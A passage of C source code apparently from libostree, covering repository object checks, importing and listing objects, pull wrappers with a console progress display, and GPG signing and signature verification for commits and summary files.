"tombstone-commits", FALSE, &tombstone_commits, error)) return FALSE; if (tombstone_commits) { g_auto(GVariantBuilder) builder = OT_VARIANT_BUILDER_INITIALIZER; g_autoptr(GVariant) variant = NULL; g_variant_builder_init (&builder, G_VARIANT_TYPE ("a{sv}")); g_variant_builder_add (&builder, "{sv}", "commit", g_variant_new_bytestring (sha256)); variant = g_variant_ref_sink (g_variant_builder_end (&builder)); if (!ostree_repo_write_metadata_trusted (self, OSTREE_OBJECT_TYPE_TOMBSTONE_COMMIT, sha256, variant, cancellable, error)) return FALSE; } } return TRUE; } /* Thin wrapper for _ostree_verify_metadata_object() */ static gboolean fsck_metadata_object (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GCancellable *cancellable, GError **error) { const char *errmsg = glnx_strjoina ("fsck ", sha256, ".", ostree_object_type_to_string (objtype)); GLNX_AUTO_PREFIX_ERROR (errmsg, error); g_autoptr(GVariant) metadata = NULL; if (!load_metadata_internal (self, objtype, sha256, TRUE, &metadata, NULL, NULL, NULL, cancellable, error)) return FALSE; return _ostree_verify_metadata_object (objtype, sha256, metadata, error); } static gboolean fsck_content_object (OstreeRepo *self, const char *sha256, GCancellable *cancellable, GError **error) { const char *errmsg = glnx_strjoina ("fsck content object ", sha256); GLNX_AUTO_PREFIX_ERROR (errmsg, error); g_autoptr(GInputStream) input = NULL; g_autoptr(GFileInfo) file_info = NULL; g_autoptr(GVariant) xattrs = NULL; if (!ostree_repo_load_file (self, sha256, &input, &file_info, &xattrs, cancellable, error)) return FALSE; /* TODO more consistency checks here */ const guint32 mode = g_file_info_get_attribute_uint32 (file_info, "unix::mode"); if (!ostree_validate_structureof_file_mode (mode, error)) return FALSE; g_autofree guchar *computed_csum = NULL; if (!ostree_checksum_file_from_input (file_info, xattrs, input, OSTREE_OBJECT_TYPE_FILE, &computed_csum, cancellable, error)) return FALSE; char actual_checksum[OSTREE_SHA256_STRING_LEN+1]; ostree_checksum_inplace_from_bytes (computed_csum, actual_checksum); return _ostree_compare_object_checksum (OSTREE_OBJECT_TYPE_FILE, sha256, actual_checksum, error); } /** * ostree_repo_fsck_object: * @self: Repo * @objtype: Object type * @sha256: Checksum * @cancellable: Cancellable * @error: Error * * Verify consistency of the object; this performs checks only relevant to the * immediate object itself, such as checksumming. This API call will not itself * traverse metadata objects for example. * * Since: 2017.15 */ gboolean ostree_repo_fsck_object (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GCancellable *cancellable, GError **error) { if (OSTREE_OBJECT_TYPE_IS_META (objtype)) return fsck_metadata_object (self, objtype, sha256, cancellable, error); else return fsck_content_object (self, sha256, cancellable, error); } /** * ostree_repo_import_object_from: * @self: Destination repo * @source: Source repo * @objtype: Object type * @checksum: checksum * @cancellable: Cancellable * @error: Error * * Copy object named by @objtype and @checksum into @self from the * source repository @source. If both repositories are of the same * type and on the same filesystem, this will simply be a fast Unix * hard link operation. * * Otherwise, a copy will be performed. */ gboolean ostree_repo_import_object_from (OstreeRepo *self, OstreeRepo *source, OstreeObjectType objtype, const char *checksum, GCancellable *cancellable, GError **error) { return ostree_repo_import_object_from_with_trust (self, source, objtype, checksum, TRUE, cancellable, error); } /** * ostree_repo_import_object_from_with_trust: * @self: Destination repo * @source: Source repo * @objtype: Object type * @checksum: checksum * @trusted: If %TRUE, assume the source repo is valid and trusted * @cancellable: Cancellable * @error: Error * * Copy object named by @objtype and @checksum into @self from the * source repository @source. If @trusted is %TRUE and both * repositories are of the same type and on the same filesystem, * this will simply be a fast Unix hard link operation. * * Otherwise, a copy will be performed. * * Since: 2016.5 */ gboolean ostree_repo_import_object_from_with_trust (OstreeRepo *self, OstreeRepo *source, OstreeObjectType objtype, const char *checksum, gboolean trusted, GCancellable *cancellable, GError **error) { /* This just wraps a currently internal API, may make it public later */ OstreeRepoImportFlags flags = trusted ? _OSTREE_REPO_IMPORT_FLAGS_TRUSTED : 0; return _ostree_repo_import_object (self, source, objtype, checksum, flags, cancellable, error); } /** * ostree_repo_query_object_storage_size: * @self: Repo * @objtype: Object type * @sha256: Checksum * @out_size: (out): Size in bytes object occupies physically * @cancellable: Cancellable * @error: Error * * Return the size in bytes of object with checksum @sha256, after any * compression has been applied. */ gboolean ostree_repo_query_object_storage_size (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, guint64 *out_size, GCancellable *cancellable, GError **error) { char loose_path[_OSTREE_LOOSE_PATH_MAX]; _ostree_loose_path (loose_path, sha256, objtype, self->mode); int res; struct stat stbuf; res = TEMP_FAILURE_RETRY (fstatat (self->objects_dir_fd, loose_path, &stbuf, AT_SYMLINK_NOFOLLOW)); if (res < 0 && errno == ENOENT && self->commit_stagedir.initialized) res = TEMP_FAILURE_RETRY (fstatat (self->commit_stagedir.fd, loose_path, &stbuf, AT_SYMLINK_NOFOLLOW)); if (res < 0) return glnx_throw_errno_prefix (error, "Querying object %s.%s", sha256, ostree_object_type_to_string (objtype)); *out_size = stbuf.st_size; return TRUE; } /** * ostree_repo_load_variant_if_exists: * @self: Repo * @objtype: Object type * @sha256: ASCII checksum * @out_variant: (out) (transfer full): Metadata * @error: Error * * Attempt to load the metadata object @sha256 of type @objtype if it * exists, storing the result in @out_variant. If it doesn't exist, * %NULL is returned. */ gboolean ostree_repo_load_variant_if_exists (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GVariant **out_variant, GError **error) { return load_metadata_internal (self, objtype, sha256, FALSE, out_variant, NULL, NULL, NULL, NULL, error); } /** * ostree_repo_load_variant: * @self: Repo * @objtype: Expected object type * @sha256: Checksum string * @out_variant: (out) (transfer full): Metadata object * @error: Error * * Load the metadata object @sha256 of type @objtype, storing the * result in @out_variant. */ gboolean ostree_repo_load_variant (OstreeRepo *self, OstreeObjectType objtype, const char *sha256, GVariant **out_variant, GError **error) { return load_metadata_internal (self, objtype, sha256, TRUE, out_variant, NULL, NULL, NULL, NULL, error); } /** * ostree_repo_load_commit: * @self: Repo * @checksum: Commit checksum * @out_commit: (out) (allow-none): Commit * @out_state: (out) (allow-none): Commit state * @error: Error * * A version of ostree_repo_load_variant() specialized to commits, * capable of returning extended state information. Currently * the only extended state is %OSTREE_REPO_COMMIT_STATE_PARTIAL, which * means that only a sub-path of the commit is available. */ gboolean ostree_repo_load_commit (OstreeRepo *self, const char *checksum, GVariant **out_variant, OstreeRepoCommitState *out_state, GError **error) { return load_metadata_internal (self, OSTREE_OBJECT_TYPE_COMMIT, checksum, TRUE, out_variant, NULL, NULL, out_state, NULL, error); } /** * ostree_repo_list_objects: * @self: Repo * @flags: Flags controlling enumeration * @out_objects: (out) (transfer container) (element-type GVariant GVariant): * Map of serialized object name to variant data * @cancellable: Cancellable * @error: Error * * This function synchronously enumerates all objects in the * repository, returning data in @out_objects. @out_objects * maps from keys returned by ostree_object_name_serialize() * to #GVariant values of type %OSTREE_REPO_LIST_OBJECTS_VARIANT_TYPE. * * Returns: %TRUE on success, %FALSE on error, and @error will be set */ gboolean ostree_repo_list_objects (OstreeRepo *self, OstreeRepoListObjectsFlags flags, GHashTable **out_objects, GCancellable *cancellable, GError **error) { g_return_val_if_fail (error == NULL || *error == NULL, FALSE); g_return_val_if_fail (self->inited, FALSE); g_autoptr(GHashTable) ret_objects = g_hash_table_new_full (ostree_hash_object_name, g_variant_equal, (GDestroyNotify) g_variant_unref, (GDestroyNotify) g_variant_unref); if (flags & OSTREE_REPO_LIST_OBJECTS_ALL) flags |= (OSTREE_REPO_LIST_OBJECTS_LOOSE | OSTREE_REPO_LIST_OBJECTS_PACKED); if (flags & OSTREE_REPO_LIST_OBJECTS_LOOSE) { if (!list_loose_objects (self, ret_objects, NULL, cancellable, error)) return FALSE; if ((flags & OSTREE_REPO_LIST_OBJECTS_NO_PARENTS) == 0 && self->parent_repo) { if (!list_loose_objects (self->parent_repo, ret_objects, NULL, cancellable, error)) return FALSE; } } if (flags & OSTREE_REPO_LIST_OBJECTS_PACKED) { /* Nothing for now... */ } ot_transfer_out_value (out_objects, &ret_objects); return TRUE; } /** * ostree_repo_list_commit_objects_starting_with: * @self: Repo * @start: List commits starting with this checksum * @out_commits: (out) (transfer container) (element-type GVariant GVariant): * Map of serialized commit name to variant data * @cancellable: Cancellable * @error: Error * * This function synchronously enumerates all commit objects starting * with @start, returning data in @out_commits. * * Returns: %TRUE on success, %FALSE on error, and @error will be set */ gboolean ostree_repo_list_commit_objects_starting_with (OstreeRepo *self, const char *start, GHashTable **out_commits, GCancellable *cancellable, GError **error) { g_return_val_if_fail (error == NULL || *error == NULL, FALSE); g_return_val_if_fail (self->inited, FALSE); g_autoptr(GHashTable) ret_commits = g_hash_table_new_full (ostree_hash_object_name, g_variant_equal, (GDestroyNotify) g_variant_unref, (GDestroyNotify) g_variant_unref); if (!list_loose_objects (self, ret_commits, start, cancellable, error)) return FALSE; if (self->parent_repo) { if (!list_loose_objects (self->parent_repo, ret_commits, start, cancellable, error)) return FALSE; } ot_transfer_out_value (out_commits, &ret_commits); return TRUE; } /** * ostree_repo_read_commit: * @self: Repo * @ref: Ref or ASCII checksum * @out_root: (out): An #OstreeRepoFile corresponding to the root * @out_commit: (out): The resolved commit checksum * @cancellable: Cancellable * @error: Error * * Load the content for @rev into @out_root. */ gboolean ostree_repo_read_commit (OstreeRepo *self, const char *ref, GFile **out_root, char **out_commit, GCancellable *cancellable, GError **error) { g_autofree char *resolved_commit = NULL; if (!ostree_repo_resolve_rev (self, ref, FALSE, &resolved_commit, error)) return FALSE; g_autoptr(GFile) ret_root = (GFile*) _ostree_repo_file_new_for_commit (self, resolved_commit, error); if (!ret_root) return FALSE; if (!ostree_repo_file_ensure_resolved ((OstreeRepoFile*)ret_root, error)) return FALSE; ot_transfer_out_value(out_root, &ret_root); ot_transfer_out_value(out_commit, &resolved_commit); return TRUE; } /** * ostree_repo_pull: * @self: Repo * @remote_name: Name of remote * @refs_to_fetch: (array zero-terminated=1) (element-type utf8) (allow-none): Optional list of refs; if %NULL, fetch all configured refs * @flags: Options controlling fetch behavior * @progress: (allow-none): Progress * @cancellable: Cancellable * @error: Error * * Connect to the remote repository, fetching the specified set of * refs @refs_to_fetch. For each ref that is changed, download the * commit, all metadata, and all content objects, storing them safely * on disk in @self. * * If @flags contains %OSTREE_REPO_PULL_FLAGS_MIRROR, and * the @refs_to_fetch is %NULL, and the remote repository contains a * summary file, then all refs will be fetched. * * If @flags contains %OSTREE_REPO_PULL_FLAGS_COMMIT_ONLY, then only the * metadata for the commits in @refs_to_fetch is pulled. * * Warning: This API will iterate the thread default main context, * which is a bug, but kept for compatibility reasons. If you want to * avoid this, use g_main_context_push_thread_default() to push a new * one around this call. */ gboolean ostree_repo_pull (OstreeRepo *self, const char *remote_name, char **refs_to_fetch, OstreeRepoPullFlags flags, OstreeAsyncProgress *progress, GCancellable *cancellable, GError **error) { return ostree_repo_pull_one_dir (self, remote_name, NULL, refs_to_fetch, flags, progress, cancellable, error); } /** * ostree_repo_pull_one_dir: * @self: Repo * @remote_name: Name of remote * @dir_to_pull: Subdirectory path * @refs_to_fetch: (array zero-terminated=1) (element-type utf8) (allow-none): Optional list of refs; if %NULL, fetch all configured refs * @flags: Options controlling fetch behavior * @progress: (allow-none): Progress * @cancellable: Cancellable * @error: Error * * This is similar to ostree_repo_pull(), but only fetches a single * subpath. */ gboolean ostree_repo_pull_one_dir (OstreeRepo *self, const char *remote_name, const char *dir_to_pull, char **refs_to_fetch, OstreeRepoPullFlags flags, OstreeAsyncProgress *progress, GCancellable *cancellable, GError **error) { GVariantBuilder builder; g_autoptr(GVariant) options = NULL; g_variant_builder_init (&builder, G_VARIANT_TYPE ("a{sv}")); if (dir_to_pull) g_variant_builder_add (&builder, "{s@v}", "subdir", g_variant_new_variant (g_variant_new_string (dir_to_pull))); g_variant_builder_add (&builder, "{s@v}", "flags", g_variant_new_variant (g_variant_new_int32 (flags))); if (refs_to_fetch) g_variant_builder_add (&builder, "{s@v}", "refs", g_variant_new_variant (g_variant_new_strv ((const char *const*) refs_to_fetch, -1))); options = g_variant_ref_sink (g_variant_builder_end (&builder)); return ostree_repo_pull_with_options (self, remote_name, options, progress, cancellable, error); } /** * _formatted_time_remaining_from_seconds * @seconds_remaining: Estimated number of seconds remaining. * * Returns a strings showing the number of days, hours, minutes * and seconds remaining. **/ static char * _formatted_time_remaining_from_seconds (guint64 seconds_remaining) { guint64 minutes_remaining = seconds_remaining / 60; guint64 hours_remaining = minutes_remaining / 60; guint64 days_remaining = hours_remaining / 24; GString *description = g_string_new (NULL); if (days_remaining) g_string_append_printf (description, "%" G_GUINT64_FORMAT " days ", days_remaining); if (hours_remaining) g_string_append_printf (description, "%" G_GUINT64_FORMAT " hours ", hours_remaining % 24); if (minutes_remaining) g_string_append_printf (description, "%" G_GUINT64_FORMAT " minutes ", minutes_remaining % 60); g_string_append_printf (description, "%" G_GUINT64_FORMAT " seconds ", seconds_remaining % 60); return g_string_free (description, FALSE); } /** * ostree_repo_pull_default_console_progress_changed: * @progress: Async progress * @user_data: (allow-none): User data * * Convenient "changed" callback for use with * ostree_async_progress_new_and_connect() when pulling from a remote * repository. * * Depending on the state of the #OstreeAsyncProgress, either displays a * custom status message, or else outstanding fetch progress in bytes/sec, * or else outstanding content or metadata writes to the repository in * number of objects. * * Compatibility note: this function previously assumed that @user_data * was a pointer to a #GSConsole instance. This is no longer the case, * and @user_data is ignored. **/ void ostree_repo_pull_default_console_progress_changed (OstreeAsyncProgress *progress, gpointer user_data) { g_autofree char *status = NULL; gboolean caught_error, scanning; guint outstanding_fetches; guint outstanding_metadata_fetches; guint outstanding_writes; guint n_scanned_metadata; guint fetched_delta_parts; guint total_delta_parts; guint fetched_delta_part_fallbacks; guint total_delta_part_fallbacks; g_autoptr(GString) buf = g_string_new (""); ostree_async_progress_get (progress, "outstanding-fetches", "u", &outstanding_fetches, "outstanding-metadata-fetches", "u", &outstanding_metadata_fetches, "outstanding-writes", "u", &outstanding_writes, "caught-error", "b", &caught_error, "scanning", "u", &scanning, "scanned-metadata", "u", &n_scanned_metadata, "fetched-delta-parts", "u", &fetched_delta_parts, "total-delta-parts", "u", &total_delta_parts, "fetched-delta-fallbacks", "u", &fetched_delta_part_fallbacks, "total-delta-fallbacks", "u", &total_delta_part_fallbacks, "status", "s", &status, NULL); if (*status != '\0') { g_string_append (buf, status); } else if (caught_error) { g_string_append_printf (buf, "Caught error, waiting for outstanding tasks"); } else if (outstanding_fetches) { guint64 bytes_transferred, start_time, total_delta_part_size; guint fetched, metadata_fetched, requested; guint64 current_time = g_get_monotonic_time (); g_autofree char *formatted_bytes_transferred = NULL; g_autofree char *formatted_bytes_sec = NULL; guint64 bytes_sec; /* Note: This is not atomic wrt the above getter call. */ ostree_async_progress_get (progress, "bytes-transferred", "t", &bytes_transferred, "fetched", "u", &fetched, "metadata-fetched", "u", &metadata_fetched, "requested", "u", &requested, "start-time", "t", &start_time, "total-delta-part-size", "t", &total_delta_part_size, NULL); formatted_bytes_transferred = g_format_size_full (bytes_transferred, 0); /* Ignore the first second, or when we haven't transferred any * data, since those could cause divide by zero below. */ if ((current_time - start_time) < G_USEC_PER_SEC || bytes_transferred == 0) { bytes_sec = 0; formatted_bytes_sec = g_strdup ("-"); } else { bytes_sec = bytes_transferred / ((current_time - start_time) / G_USEC_PER_SEC); formatted_bytes_sec = g_format_size (bytes_sec); } /* Are we doing deltas? If so, we can be more accurate */ if (total_delta_parts > 0) { guint64 fetched_delta_part_size = ostree_async_progress_get_uint64 (progress, "fetched-delta-part-size"); g_autofree char *formatted_fetched = NULL; g_autofree char *formatted_total = NULL; /* Here we merge together deltaparts + fallbacks to avoid bloating the text UI */ fetched_delta_parts += fetched_delta_part_fallbacks; total_delta_parts += total_delta_part_fallbacks; formatted_fetched = g_format_size (fetched_delta_part_size); formatted_total = g_format_size (total_delta_part_size); if (bytes_sec > 0) { guint64 est_time_remaining = 0; if (total_delta_part_size > fetched_delta_part_size) est_time_remaining = (total_delta_part_size - fetched_delta_part_size) / bytes_sec; g_autofree char *formatted_est_time_remaining = _formatted_time_remaining_from_seconds (est_time_remaining); /* No space between %s and remaining, since formatted_est_time_remaining has a trailing space */ g_string_append_printf (buf, "Receiving delta parts: %u/%u %s/%s %s/s %sremaining", fetched_delta_parts, total_delta_parts, formatted_fetched, formatted_total, formatted_bytes_sec, formatted_est_time_remaining); } else { g_string_append_printf (buf, "Receiving delta parts: %u/%u %s/%s", fetched_delta_parts, total_delta_parts, formatted_fetched, formatted_total); } } else if (scanning || outstanding_metadata_fetches) { g_string_append_printf (buf, "Receiving metadata objects: %u/(estimating) %s/s %s", metadata_fetched, formatted_bytes_sec, formatted_bytes_transferred); } else { g_string_append_printf (buf, "Receiving objects: %u%% (%u/%u) %s/s %s", (guint)((((double)fetched) / requested) * 100), fetched, requested, formatted_bytes_sec, formatted_bytes_transferred); } } else if (outstanding_writes) { g_string_append_printf (buf, "Writing objects: %u", outstanding_writes); } else { g_string_append_printf (buf, "Scanning metadata: %u", n_scanned_metadata); } glnx_console_text (buf->str); } /** * ostree_repo_append_gpg_signature: * @self: Self * @commit_checksum: SHA256 of given commit to sign * @signature_bytes: Signature data * @cancellable: A #GCancellable * @error: a #GError * * Append a GPG signature to a commit. */ gboolean ostree_repo_append_gpg_signature (OstreeRepo *self, const gchar *commit_checksum, GBytes *signature_bytes, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) metadata = NULL; if (!ostree_repo_read_commit_detached_metadata (self, commit_checksum, &metadata, cancellable, error)) return FALSE; #ifndef OSTREE_DISABLE_GPGME g_autoptr(GVariant) new_metadata = _ostree_detached_metadata_append_gpg_sig (metadata, signature_bytes); if (!ostree_repo_write_commit_detached_metadata (self, commit_checksum, new_metadata, cancellable, error)) return FALSE; return TRUE; #else return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } #ifndef OSTREE_DISABLE_GPGME static gboolean sign_data (OstreeRepo *self, GBytes *input_data, const gchar *key_id, const gchar *homedir, GBytes **out_signature, GCancellable *cancellable, GError **error) { g_auto(GLnxTmpfile) tmpf = { 0, }; if (!glnx_open_tmpfile_linkable_at (self->tmp_dir_fd, ".", O_RDWR | O_CLOEXEC, &tmpf, error)) return FALSE; g_autoptr(GOutputStream) tmp_signature_output = g_unix_output_stream_new (tmpf.fd, FALSE); g_auto(gpgme_ctx_t) context = ot_gpgme_new_ctx (homedir, error); if (!context) return FALSE; /* Get the secret keys with the given key id */ g_auto(gpgme_key_t) key = NULL; gpgme_error_t err = gpgme_get_key (context, key_id, &key, 1); if (gpgme_err_code (err) == GPG_ERR_EOF) return glnx_throw (error, "No gpg key found with ID %s (homedir: %s)", key_id, homedir ? homedir : "<default>"); else if (gpgme_err_code (err) == GPG_ERR_AMBIGUOUS_NAME) { return glnx_throw (error, "gpg key id %s ambiguous (homedir: %s). Try the fingerprint instead", key_id, homedir ? homedir : "<default>"); } else if (err != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Unable to lookup key ID %s", key_id); /* Add the key to the context as a signer */ if ((err = gpgme_signers_add (context, key)) != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Error signing commit"); /* Get a gpg buffer from the commit */ g_auto(gpgme_data_t) commit_buffer = NULL; gsize len; const char *buf = g_bytes_get_data (input_data, &len); if ((err = gpgme_data_new_from_mem (&commit_buffer, buf, len, FALSE)) != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Failed to create buffer from commit file"); /* Sign it */ g_auto(gpgme_data_t) signature_buffer = ot_gpgme_data_output (tmp_signature_output); if ((err = gpgme_op_sign (context, commit_buffer, signature_buffer, GPGME_SIG_MODE_DETACH)) != GPG_ERR_NO_ERROR) return ot_gpgme_throw (err, error, "Failure signing commit file"); if (!g_output_stream_close (tmp_signature_output, cancellable, error)) return FALSE; /* Return a mmap() reference */ g_autoptr(GMappedFile) signature_file = g_mapped_file_new_from_fd (tmpf.fd, FALSE, error); if (!signature_file) return FALSE; if (out_signature) *out_signature = g_mapped_file_get_bytes (signature_file); return TRUE; } #endif /* OSTREE_DISABLE_GPGME */ /** * ostree_repo_sign_commit: * @self: Self * @commit_checksum: SHA256 of given commit to sign * @key_id: Use this GPG key id * @homedir: (allow-none): GPG home directory, or %NULL * @cancellable: A #GCancellable * @error: a #GError * * Add a GPG signature to a commit. */ gboolean ostree_repo_sign_commit (OstreeRepo *self, const gchar *commit_checksum, const gchar *key_id, const gchar *homedir, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME g_autoptr(GBytes) commit_data = NULL; g_autoptr(GBytes) signature = NULL; g_autoptr(GVariant) commit_variant = NULL; if (!ostree_repo_load_variant (self, OSTREE_OBJECT_TYPE_COMMIT, commit_checksum, &commit_variant, error)) return glnx_prefix_error (error, "Failed to read commit"); g_autoptr(GVariant) old_metadata = NULL; if (!ostree_repo_read_commit_detached_metadata (self, commit_checksum, &old_metadata, cancellable, error)) return glnx_prefix_error (error, "Failed to read detached metadata"); commit_data = g_variant_get_data_as_bytes (commit_variant); /* The verify operation is merely to parse any existing signatures to * check if the commit has already been signed with the given key ID. * We want to avoid storing duplicate signatures in the metadata. We * pass the homedir so that the signing key can be imported, allowing * subkey signatures to be recognised. */ g_autoptr(GError) local_error = NULL; g_autoptr(GFile) verify_keydir = NULL; if (homedir != NULL) verify_keydir = g_file_new_for_path (homedir); g_autoptr(OstreeGpgVerifyResult) result =_ostree_repo_gpg_verify_with_metadata (self, commit_data, old_metadata, NULL, verify_keydir, NULL, cancellable, &local_error); if (!result) { /* "Not found" just means the commit is not yet signed. That's okay. */ if (g_error_matches (local_error, OSTREE_GPG_ERROR, OSTREE_GPG_ERROR_NO_SIGNATURE)) { g_clear_error (&local_error); } else return g_propagate_error (error, g_steal_pointer (&local_error)), FALSE; } else if (ostree_gpg_verify_result_lookup (result, key_id, NULL)) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_EXISTS, "Commit is already signed with GPG key %s", key_id); return FALSE; } if (!sign_data (self, commit_data, key_id, homedir, &signature, cancellable, error)) return FALSE; g_autoptr(GVariant) new_metadata = _ostree_detached_metadata_append_gpg_sig (old_metadata, signature); if (!ostree_repo_write_commit_detached_metadata (self, commit_checksum, new_metadata, cancellable, error)) return FALSE; return TRUE; #else /* FIXME: Return false until refactoring */ return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_sign_delta: * @self: Self * @from_commit: From commit * @to_commit: To commit * @key_id: key id * @homedir: homedir * @cancellable: cancellable * @error: error * * This function is deprecated, sign the summary file instead. * Add a GPG signature to a static delta. */ gboolean ostree_repo_sign_delta (OstreeRepo *self, const gchar *from_commit, const gchar *to_commit, const gchar *key_id, const gchar *homedir, GCancellable *cancellable, GError **error) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_SUPPORTED, "ostree_repo_sign_delta is deprecated"); return FALSE; } /** * ostree_repo_add_gpg_signature_summary: * @self: Self * @key_id: (array zero-terminated=1) (element-type utf8): NULL-terminated array of GPG keys. * @homedir: (allow-none): GPG home directory, or %NULL * @cancellable: A #GCancellable * @error: a #GError * * Add a GPG signature to a summary file. */ gboolean ostree_repo_add_gpg_signature_summary (OstreeRepo *self, const gchar **key_id, const gchar *homedir, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME glnx_autofd int fd = -1; if (!glnx_openat_rdonly (self->repo_dir_fd, "summary", TRUE, &fd, error)) return FALSE; g_autoptr(GBytes) summary_data = ot_fd_readall_or_mmap (fd, 0, error); if (!summary_data) return FALSE; /* Note that fd is reused below */ glnx_close_fd (&fd); g_autoptr(GVariant) metadata = NULL; if (!ot_openat_ignore_enoent (self->repo_dir_fd, "summary.sig", &fd, error)) return FALSE; if (fd >= 0) { if (!ot_variant_read_fd (fd, 0, G_VARIANT_TYPE (OSTREE_SUMMARY_SIG_GVARIANT_STRING), FALSE, &metadata, error)) return FALSE; } for (guint i = 0; key_id[i]; i++) { g_autoptr(GBytes) signature_data = NULL; if (!sign_data (self, summary_data, key_id[i], homedir, &signature_data, cancellable, error)) return FALSE; g_autoptr(GVariant) old_metadata = g_steal_pointer (&metadata); metadata = _ostree_detached_metadata_append_gpg_sig (old_metadata, signature_data); } g_autoptr(GVariant) normalized = g_variant_get_normal_form (metadata); if (!_ostree_repo_file_replace_contents (self, self->repo_dir_fd, "summary.sig", g_variant_get_data (normalized), g_variant_get_size (normalized), cancellable, error)) return FALSE; return TRUE; #else return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_gpg_sign_data: * @self: Self * @data: Data as a #GBytes * @old_signatures: Existing signatures to append to (or %NULL) * @key_id: (array zero-terminated=1) (element-type utf8): NULL-terminated array of GPG keys. * @homedir: (allow-none): GPG home directory, or %NULL * @out_signatures: (out): in case of success will contain signature * @cancellable: A #GCancellable * @error: a #GError * * Sign the given @data with the specified keys in @key_id. Similar to * ostree_repo_add_gpg_signature_summary() but can be used on any * data. * * You can use ostree_repo_gpg_verify_data() to verify the signatures. * * Returns: @TRUE if @data has been signed successfully, * @FALSE in case of error (@error will contain the reason). * * Since: 2020.8 */ gboolean ostree_repo_gpg_sign_data (OstreeRepo *self, GBytes *data, GBytes *old_signatures, const gchar **key_id, const gchar *homedir, GBytes **out_signatures, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME g_autoptr(GVariant) metadata = NULL; g_autoptr(GVariant) res = NULL; if (old_signatures) metadata = g_variant_ref_sink (g_variant_new_from_bytes (G_VARIANT_TYPE (OSTREE_SUMMARY_SIG_GVARIANT_STRING), old_signatures, FALSE)); for (guint i = 0; key_id[i]; i++) { g_autoptr(GBytes) signature_data = NULL; if (!sign_data (self, data, key_id[i], homedir, &signature_data, cancellable, error)) return FALSE; g_autoptr(GVariant) old_metadata = g_steal_pointer (&metadata); metadata = _ostree_detached_metadata_append_gpg_sig (old_metadata, signature_data); } res = g_variant_get_normal_form (metadata); *out_signatures = g_variant_get_data_as_bytes (res); return TRUE; #else return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } #ifndef OSTREE_DISABLE_GPGME /* Special remote for _ostree_repo_gpg_verify_with_metadata() */ static const char *OSTREE_ALL_REMOTES = "__OSTREE_ALL_REMOTES__"; /* Look for a keyring for @remote in the repo itself, or in * /etc/ostree/remotes.d. */ static gboolean find_keyring (OstreeRepo *self, OstreeRemote *remote, GBytes **ret_bytes, GCancellable *cancellable, GError **error) { glnx_autofd int fd = -1; if (!ot_openat_ignore_enoent (self->repo_dir_fd, remote->keyring, &fd, error)) return FALSE; if (fd != -1) { GBytes *ret = glnx_fd_readall_bytes (fd, cancellable, error); if (!ret) return FALSE; *ret_bytes = ret; return TRUE; } g_autoptr(GFile) remotes_d = get_remotes_d_dir (self, NULL); if (remotes_d) { g_autoptr(GFile) child = g_file_get_child (remotes_d, remote->keyring); if (!ot_openat_ignore_enoent (AT_FDCWD, gs_file_get_path_cached (child), &fd, error)) return FALSE; if (fd != -1) { GBytes *ret = glnx_fd_readall_bytes (fd, cancellable, error); if (!ret) return FALSE; *ret_bytes = ret; return TRUE; } } if (self->parent_repo) return find_keyring (self->parent_repo, remote, ret_bytes, cancellable, error); *ret_bytes = NULL; return TRUE; } static OstreeGpgVerifyResult * _ostree_repo_gpg_verify_data_internal (OstreeRepo *self, const gchar *remote_name, GBytes *data, GBytes *signatures, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_autoptr(OstreeGpgVerifier) verifier = NULL; gboolean add_global_keyring_dir = TRUE; verifier = _ostree_gpg_verifier_new (); if (remote_name == OSTREE_ALL_REMOTES) { /* Add all available remote keyring files. */ if (!_ostree_gpg_verifier_add_keyring_dir_at (verifier, self->repo_dir_fd, ".", cancellable, error)) return NULL; } else if (remote_name != NULL) { /* Add the remote's keyring file if it exists. */ g_autoptr(OstreeRemote) remote = NULL; remote = _ostree_repo_get_remote_inherited (self, remote_name, error); if (remote == NULL) return NULL; g_autoptr(GBytes) keyring_data = NULL; if (!find_keyring (self, remote, &keyring_data, cancellable, error)) return NULL; if (keyring_data != NULL) { _ostree_gpg_verifier_add_keyring_data (verifier, keyring_data, remote->keyring); add_global_keyring_dir = FALSE; } g_auto(GStrv) gpgkeypath_list = NULL; if (!ot_keyfile_get_string_list_with_separator_choice (remote->options, remote->group, "gpgkeypath", ";,", &gpgkeypath_list, error)) return NULL; if (gpgkeypath_list) { for (char **iter = gpgkeypath_list; *iter != NULL; ++iter) if (!_ostree_gpg_verifier_add_keyfile_path (verifier, *iter, cancellable, error)) return NULL; } } if (add_global_keyring_dir) { /* Use the deprecated global keyring directory. */ if (!_ostree_gpg_verifier_add_global_keyring_dir (verifier, cancellable, error)) return NULL; } if (keyringdir) { if (!_ostree_gpg_verifier_add_keyring_dir (verifier, keyringdir, cancellable, error)) return NULL; } if (extra_keyring != NULL) { _ostree_gpg_verifier_add_keyring_file (verifier, extra_keyring); } return _ostree_gpg_verifier_check_signature (verifier, data, signatures, cancellable, error); } OstreeGpgVerifyResult * _ostree_repo_gpg_verify_with_metadata (OstreeRepo *self, GBytes *signed_data, GVariant *metadata, const char *remote_name, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) signaturedata = NULL; GByteArray *buffer; GVariantIter iter; GVariant *child; g_autoptr (GBytes) signatures = NULL; if (metadata) signaturedata = g_variant_lookup_value (metadata, _OSTREE_METADATA_GPGSIGS_NAME, _OSTREE_METADATA_GPGSIGS_TYPE); if (!signaturedata) { g_set_error_literal (error, OSTREE_GPG_ERROR, 